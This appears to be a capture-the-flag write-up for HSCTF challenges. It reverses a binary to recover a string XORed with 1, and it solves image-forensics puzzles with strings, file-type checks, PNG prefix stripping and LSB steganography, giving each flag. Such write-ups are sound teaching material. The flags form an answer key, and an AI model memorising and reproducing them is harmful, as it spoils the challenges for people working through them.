|   :  |    0x0000083d      c645ea39       mov byte [var_16h], 0x39    ; '9'
|   :  |    0x00000841      c645eb69       mov byte [var_15h], 0x69    ; 'i'
|   :  |    0x00000845      c645ec33       mov byte [var_14h], 0x33    ; '3'
|   :  |    0x00000849      c645ed63       mov byte [var_13h], 0x63    ; 'c'
|   :  |    0x0000084d      c645ee40       mov byte [var_12h], 0x40    ; segment.PHDR
|   :  |    0x00000851      c645ef31       mov byte [var_11h], 0x31    ; '1'
|   :  |    0x00000855      c645f033       mov byte [var_10h], 0x33    ; '3'
|   :  |    0x00000859      c645f138       mov byte [var_fh], 0x38     ; '8'
|   :  |    0x0000085d      c645f27c       mov byte [var_eh], 0x7c     ; '|'
|   :  |    0x00000861      c645f300       mov byte [var_dh], 0
|   :  |    0x00000865      488b55c8       mov rdx, qword [var_38h]
|   :  |    0x00000869      488d45d0       lea rax, [var_30h]
|   :  |    0x0000086d      4889d6         mov rsi, rdx
|   :  |    0x00000870      4889c7         mov rdi, rax
|   :  |    0x00000873      e898fdffff     call sym.imp.strcmp         ; int strcmp(const char *s1, const char *s2)
|   :  |    0x00000878      85c0           test eax, eax
|   `=====< 0x0000087a      0f85e4feffff   jne 0x764
|      |    0x00000880      488d3dc20000.  lea rdi, str.Oof__ur_too_good ; 0x949 ; "Oof, ur too good"
|      |    0x00000887      e854fdffff     call sym.imp.puts           ; int puts(const char *s)
|      |    0x0000088c      b800000000     mov eax, 0
|      |    ; CODE XREF from main (0x776)
|      `--> 0x00000891      488b75f8       mov rsi, qword [var_8h]
|           0x00000895      644833342528.  xor rsi, qword fs:[0x28]
|       ,=< 0x0000089e      7405           je 0x8a5
|       |   0x000008a0      e85bfdffff     call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
|       |   ; CODE XREF from main (0x89e)
|       `-> 0x000008a5      c9             leave
\           0x000008a6      c3             ret

I didn't know what 0x40 was, but anyway, the following XORs each byte with 1.

  : .---> 0x000007a5      8b45c0         mov eax, dword [var_40h]
|   : :||   0x000007a8      4863d0         movsxd rdx, eax
|   : :||   0x000007ab      488b45c8       mov rax, qword [var_38h]
|   : :||   0x000007af      4801d0         add rax, rdx
|   : :||   0x000007b2      0fb608         movzx ecx, byte [rax]
|   : :||   0x000007b5      8b45c0         mov eax, dword [var_40h]
|   : :||   0x000007b8      4863d0         movsxd rdx, eax
|   : :||   0x000007bb      488b45c8       mov rax, qword [var_38h]
|   : :||   0x000007bf      4801d0         add rax, rdx
|   : :||   0x000007c2      83f101         xor ecx, 1
|   : :||   0x000007c5      89ca           mov edx, ecx
|   : :||   0x000007c7      8810           mov byte [rax], dl
|   : :||   0x000007c9      8345c001       add dword [var_40h], 1
|   : :||   ; CODE XREF from main (0x7a3)

I also looked at it in IDA, just to be sure.

.text:00000000000007D5 058 mov     [rbp+s1], 69h ; 'i'
.text:00000000000007D9 058 mov     [rbp+var_2F], 72h ; 'r'
.text:00000000000007DD 058 mov     [rbp+var_2E], 62h ; 'b'
.text:00000000000007E1 058 mov     [rbp+var_2D], 75h ; 'u'
.text:00000000000007E5 058 mov     [rbp+var_2C], 67h ; 'g'
.text:00000000000007E9 058 mov     [rbp+var_2B], 7Ah ; 'z'
.text:00000000000007ED 058 mov     [rbp+var_2A], 76h ; 'v'
.text:00000000000007F1 058 mov     [rbp+var_29], 31h ; '1'
.text:00000000000007F5 058 mov     [rbp+var_28], 76h ; 'v'
.text:00000000000007F9 058 mov     [rbp+var_27], 5Eh ; '^'
.text:00000000000007FD 058 mov     [rbp+var_26], 78h ; 'x'
.text:0000000000000801 058 mov     [rbp+var_25], 31h ; '1'
.text:0000000000000805 058 mov     [rbp+var_24], 74h ; 't'
.text:0000000000000809 058 mov     [rbp+var_23], 5Eh ; '^'
.text:000000000000080D 058 mov     [rbp+var_22], 6Ah ; 'j'
.text:0000000000000811 058 mov     [rbp+var_21], 6Fh ; 'o'
.text:0000000000000815 058 mov     [rbp+var_20], 31h ; '1'
.text:0000000000000819 058 mov     [rbp+var_1F], 76h ; 'v'
.text:000000000000081D 058 mov     [rbp+var_1E], 5Eh ; '^'
.text:0000000000000821 058 mov     [rbp+var_1D], 65h ; 'e'
.text:0000000000000825 058 mov     [rbp+var_1C], 35h ; '5'
.text:0000000000000829 058 mov     [rbp+var_1B], 5Eh ; '^'
.text:000000000000082D 058 mov     [rbp+var_1A], 76h ; 'v'
.text:0000000000000831 058 mov     [rbp+var_19], 40h ; '@'
.text:0000000000000835 058 mov     [rbp+var_18], 32h ; '2'
.text:0000000000000839 058 mov     [rbp+var_17], 5Eh ; '^'
.text:000000000000083D 058 mov     [rbp+var_16], 39h ; '9'
.text:0000000000000841 058 mov     [rbp+var_15], 69h ; 'i'
.text:0000000000000845 058 mov     [rbp+var_14], 33h ; '3'
.text:0000000000000849 058 mov     [rbp+var_13], 63h ; 'c'
.text:000000000000084D 058 mov     [rbp+var_12], 40h ; '@'
.text:0000000000000851 058 mov     [rbp+var_11], 31h ; '1'
.text:0000000000000855 058 mov     [rbp+var_10], 33h ; '3'
.text:0000000000000859 058 mov     [rbp+var_F], 38h ; '8'
.text:000000000000085D 058 mov     [rbp+var_E], 7Ch

0x40 is @. XOR this string with 0x1.

irbugzv1v^x1t^jo1v^e5^v@2^9i3c@138|

def xor(msg, key):
    o = ''
    for i in range(len(msg)):
        o += chr(ord(msg[i]) ^ key)
    return o

s = 'irbugzv1v^x1t^jo1v^e5^v@2^9i3c@138|'

print(xor(s, 0x01))

Result:

hsctf{w0w_y0u_kn0w_d4_wA3_8h2bA029}

FLAG : hsctf{w0w_y0u_kn0w_d4_wA3_8h2bA029}

Forensics

Chicken Crossing

Keith is watching chickens cross a road in his grandfather’s farm. He once heard from his grandfather that there was something significant about this behavior, but he can’t figure out why. Help Keith discover what the chickens are doing from this seemingly simple behavior.

A jpg is given.
strings gave the flag.

$ strings hsctf-chicken_crossing.jpg | grep hs
hsctf{2_get_2_the_other_side}

FLAG : hsctf{2_get_2_the_other_side}

Cool Image

My friend told me he found a really cool image, but I couldn't open it. Can you help me access the image?

cool.pdf

cool.pdf is given.

$ file cool.pdf 
cool.pdf: PNG image data, 1326 x 89, 8-bit/color RGBA, non-interlaced

It is just a normal PNG.

FLAG : hsctf{who_uses_extensions_anyways}

Cool Image 2

My friend sent me this image, but I can't open it. Can you help me open the image?

cool.png

A png(?) is given.
First I looked at the contents in a hex editor.

The string I found this cool file. Its really cool! is embedded before the PNG signature (89 50 4E 47 0D 0A 1A 0A),
so strip it.

$ file cool.png 
cool.png: PNG image data, 1206 x 89, 8-bit/color RGBA, non-interlaced


FLAG : hsctf{sorry_about_the_extra_bytes}
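The hex-editor edit above can be done (and checked) programmatically: find the PNG signature, drop everything before it, then parse the first chunk to make sure it is a well-formed IHDR with a matching CRC, which also gives the 1206 x 89 RGBA that file reported. This is an added example, not the post's code; the sample bytes are constructed.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def carve_png(data: bytes) -> bytes:
    """Return the data from the first PNG signature onward, dropping any
    prefix such as the junk string the challenge file started with."""
    off = data.find(PNG_SIG)
    if off < 0:
        raise ValueError("no PNG signature found")
    return data[off:]


def read_ihdr(png: bytes):
    """Parse the IHDR chunk, which must come first, and verify its CRC.
    Returns (width, height, bit depth, colour type); colour type 6 is RGBA."""
    if not png.startswith(PNG_SIG):
        raise ValueError("bad signature")
    length, ctype = struct.unpack(">I4s", png[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not IHDR")
    body = png[16:29]
    crc = struct.unpack(">I", png[29:33])[0]
    if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
        raise ValueError("IHDR CRC mismatch")
    width, height, depth, colour = struct.unpack(">IIBB", body[:10])
    return width, height, depth, colour


def make_png_header(width: int, height: int, depth: int = 8, colour: int = 6) -> bytes:
    """Constructed helper: signature plus a valid IHDR chunk (no image data)."""
    body = struct.pack(">IIBBBBB", width, height, depth, colour, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF
    return PNG_SIG + struct.pack(">I", 13) + b"IHDR" + body + struct.pack(">I", crc)


# Constructed stand-in for cool.png: the junk string from the post in front of
# a PNG header describing a 1206 x 89 8-bit RGBA image.
JUNK = b"I found this cool file. Its really cool!"
SAMPLE = JUNK + make_png_header(1206, 89)

if __name__ == "__main__":
    fixed = carve_png(SAMPLE)
    print(len(SAMPLE) - len(fixed), "bytes removed")
    print(read_ihdr(fixed))
```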

Logo Sucks Bad

This logo sucks bad.

logo.png

A png is given.
First I had a look with check_png.sh from stego-toolkit.

https://github.com/DominicBreuker/stego-toolkit

(snip)

###########################
########## zsteg ##########
###########################

Watch out for red output. This tool shows lots of false positives...
b1,r,lsb,xy         .. 
b1,r,msb,xy         .. text: "NHzjjVhzXHh"
b1,g,lsb,xy         .. 
b1,g,msb,xy         .. 
b1,b,lsb,xy         .. 
b1,b,msb,xy         .. 
b1,a,lsb,xy         .. 
b1,a,msb,xy         .. 
b1,rgb,lsb,xy       .. text: "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis non velit rutrum, porttitor est a, porttitor nisi. Aliquam placerat nibh ut diam faucibus, ut auctor felis sodales. Suspendisse egestas tempus libero, efficitur finibus orci congue sit amet. Sed"
b1,rgb,msb,xy       .. 
b1,bgr,lsb,xy       .. 
b1,bgr,msb,xy       .. 
b1,rgba,lsb,xy      .. 
b1,rgba,msb,xy      .. 
b1,abgr,lsb,xy      .. 
b1,abgr,msb,xy      .. 
b2,r,lsb,xy         .. 
b2,r,msb,xy         .. 
b2,g,lsb,xy         .. text: "Q@E@A@A@E"
b2,g,msb,xy         .. 
b2,b,lsb,xy         .. 
b2,b,msb,xy         .. 
b2,a,lsb,xy         .. 
b2,a,msb,xy         .. 
b2,rgb,lsb,xy       .. 
b2,rgb,msb,xy       .. 
b2,bgr,lsb,xy       .. 
b2,bgr,msb,xy       .. 
b2,rgba,lsb,xy      .. 
b2,rgba,msb,xy      .. 
b2,abgr,lsb,xy      .. 
b2,abgr,msb,xy      .. 
b3,r,lsb,xy         .. 
b3,r,msb,xy         .. 
b3,g,lsb,xy         .. 
b3,g,msb,xy         .. 
b3,b,lsb,xy         .. 
b3,b,msb,xy         .. 
b3,a,lsb,xy         .. 
b3,a,msb,xy         .. 
b3,rgb,lsb,xy       .. 
b3,rgb,msb,xy       .. 
b3,bgr,lsb,xy       .. 
b3,bgr,msb,xy       .. 

(snip)

There is a string in b1,rgb,lsb,xy.
I extracted the bits with the steganography analyser on 青い空を見上げればいつもそこに白い猫 (it was more readily available in my environment than stegsolve).

FLAG : hsctf{th4_l3est_s3gnific3nt_bbbbbbbbbbbbb}
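What zsteg's b1,rgb,lsb,xy channel name means, as an added example rather than the post's or zsteg's code: take the least-significant bit of R, then G, then B of each pixel, pixels in row-major order, and pack the bits eight at a time into bytes. It works on pixel tuples rather than a PNG file so it runs offline; the cover image and embedded message are constructed, and MSB-first packing of the extracted bits is an assumption of this example.

```python
def extract_lsb_rgb(pixels, width, height, max_bytes=None):
    """pixels: flat list of (r, g, b[, a]) tuples, row-major, width*height long.
    Collect one LSB per R, G, B channel in x-then-y order and pack MSB-first."""
    bits = []
    for y in range(height):
        for x in range(width):
            r, g, b = pixels[y * width + x][:3]
            bits.extend((r & 1, g & 1, b & 1))
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
        if max_bytes and len(out) >= max_bytes:
            break
    return bytes(out)


def printable_prefix(data):
    """Text up to the first NUL or non-printable byte: the 'text:' part that
    zsteg reports for a channel."""
    out = bytearray()
    for b in data:
        if 32 <= b < 127 or b in (9, 10, 13):
            out.append(b)
        else:
            break
    return out.decode("ascii")


def embed_lsb_rgb(pixels, message):
    """Constructed-sample helper only: write message bits (MSB-first) into the
    R, G, B LSBs in the same order the extractor reads them."""
    bits = [(byte >> (7 - k)) & 1 for byte in message for k in range(8)]
    out, bi = [], 0
    for px in pixels:
        ch = list(px)
        for c in range(3):
            if bi < len(bits):
                ch[c] = (ch[c] & ~1) | bits[bi]
                bi += 1
        out.append(tuple(ch))
    if bi < len(bits):
        raise ValueError("image too small for message")
    return out


# Constructed 64 x 8 RGBA cover image and a stego copy carrying a NUL-terminated text.
W, H = 64, 8
COVER = [((x * 7) % 256, (y * 31) % 256, ((x + y) * 13) % 256, 255)
         for y in range(H) for x in range(W)]
MESSAGE = b"hsctf{constructed_sample}\x00"
STEGO = embed_lsb_rgb(COVER, MESSAGE)

if __name__ == "__main__":
    print(printable_prefix(extract_lsb_rgb(STEGO, W, H)))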